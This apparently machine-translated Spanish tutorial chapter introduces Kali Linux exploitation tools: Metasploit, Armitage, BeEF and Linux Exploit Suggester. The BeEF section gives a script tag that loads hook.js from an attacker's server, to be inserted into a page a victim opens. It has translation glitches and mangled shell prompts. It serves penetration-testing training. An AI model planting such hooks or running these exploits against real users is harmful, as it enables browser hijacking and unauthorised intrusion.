Kali Linux - Herramientas de explotación
En este capítulo, aprenderemos sobre las diversas herramientas de explotación que ofrece Kali Linux.
Metasploit
Como mencionamos anteriormente, Metasploit es un producto de Rapid7 y la mayoría de los recursos se pueden encontrar en su página web www.metasploit.com . Está disponible en dos versiones: edición comercial y gratuita. Las diferencias entre estas dos versiones no son muchas, por tanto, en este caso usaremos la versión comunitaria (gratuita).
Como hacker ético, utilizará "Kali Ditribution", que tiene la versión comunitaria de Metasploit incrustada, junto con otras herramientas de piratería ética que son muy cómodas al ahorrar tiempo de instalación. Sin embargo, si desea instalarla como una herramienta separada, es una aplicación que puede instalarse en los sistemas operativos como Linux, Windows y OS X.
Primero, abra la consola Metasploit en Kali. Luego, vaya a Aplicaciones → Herramientas de explotación → Metasploit.
Después de que comience, verá la siguiente pantalla, donde la versión de Metasploit está subrayada en rojo.
En la consola, si usas ayuda o? símbolo, le mostrará una lista con los comandos de MSP junto con su descripción. Puede elegir según sus necesidades y lo que utilizará.
Otro comando de administración importante es msfupdateque ayuda a actualizar el metasploit con los últimos exploits de vulnerabilidad. Después de ejecutar este comando en la consola, tendrá que esperar varios minutos hasta que se complete la actualización.
Tiene un buen comando llamado "Buscar" que puede usar para encontrar lo que desea, como se muestra en la siguiente captura de pantalla. Por ejemplo, quiero encontrar exploits relacionados con Microsoft y el comando puede sermsf >search name:Microsoft type:exploit.
Donde "buscar" es el comando, "nombre" es el nombre del objeto que estamos buscando y "tipo" es el tipo de script que estamos buscando.
Otro comando es "información". Proporciona la información sobre un módulo o plataforma donde se utiliza, quién es el autor, referencia de vulnerabilidad y la restricción de carga útil que puede tener.
Armitage
La GUI de Armitage para metasploit es una herramienta complementaria para metasploit. Visualiza objetivos, recomienda exploits y expone las funciones avanzadas posteriores a la explotación.
Vamos a abrirlo, pero en primer lugar, la consola de metasploit debería abrirse e iniciarse. Para abrir Armitage, vaya a Aplicaciones → Herramientas de explotación → Armitage.
Haga clic en el Connect , como se muestra en la siguiente captura de pantalla.
Cuando se abra, verá la siguiente pantalla.
Armitage es fácil de usar. El área "Objetivos" enumera todas las máquinas que ha descubierto y con las que está trabajando, los objetivos pirateados son de color rojo con una tormenta eléctrica sobre ellos.
Una vez que haya pirateado el objetivo, puede hacer clic derecho sobre él y continuar explorando con lo que necesita hacer, como explorar (navegar) las carpetas.
En la siguiente GUI, verá la vista de las carpetas, que se llama consola. Con solo hacer clic en las carpetas, puede navegar por las carpetas sin la necesidad de comandos de metasploit.
En el lado derecho de la GUI, hay una sección donde se enumeran los módulos de vulnerabilidades.
Carne de vaca
BeEF significa Browser Exploitation Framework. Es una herramienta de prueba de penetración que se centra en el navegador web. BeEF permite al probador de penetración profesional evaluar la postura de seguridad real de un entorno objetivo utilizando vectores de ataque del lado del cliente.
Primero, debe actualizar el paquete Kali usando los siguientes comandos:
[email protected]:/# apt-get update
[email protected]:/# apt-get install beef-xss
Para comenzar, use el siguiente comando:
[email protected]:/# cd /usr/share/beef-xss
[email protected]:/# ./beef
Abra el navegador e ingrese el nombre de usuario y la contraseña: beef.
El gancho BeEF es un archivo JavaScript alojado en el servidor BeEF que debe ejecutarse en los navegadores del cliente. Cuando lo hace, vuelve a llamar al servidor BeEF comunicando mucha información sobre el objetivo. También permite ejecutar comandos y módulos adicionales contra el objetivo. En este ejemplo, la ubicación deBeEF gancho está en http://192.168.1.101:3000/hook.js.
Para atacar un navegador, incluya el gancho de JavaScript en una página que verá el cliente. Hay varias formas de hacerlo, sin embargo, la más fácil es insertar lo siguiente en una página y hacer que el cliente la abra de alguna manera.
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
Una vez que se cargue la página, regrese al Panel de control de BeEF y haga clic en "Navegadores en línea" en la parte superior izquierda. Después de unos segundos, debería ver la ventana emergente de su dirección IP que representa un navegador conectado. Al pasar el cursor sobre la IP, se proporcionará rápidamente información como la versión del navegador, el sistema operativo y los complementos instalados.
Para ejecutar el comando de forma remota, haga clic en el host "Propiedad". Luego, en el comando haga clic en el módulo que desea ejecutar, y finalmente haga clic en "Ejecutar".
Suggester de exploits de Linux
Sugiere posibles exploits dada la versión de lanzamiento. ‘uname -r’ del sistema operativo Linux.
Para ejecutarlo, escriba el siguiente comando:
[email protected]:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 es la versión del kernel del sistema operativo Linux que queremos explotar.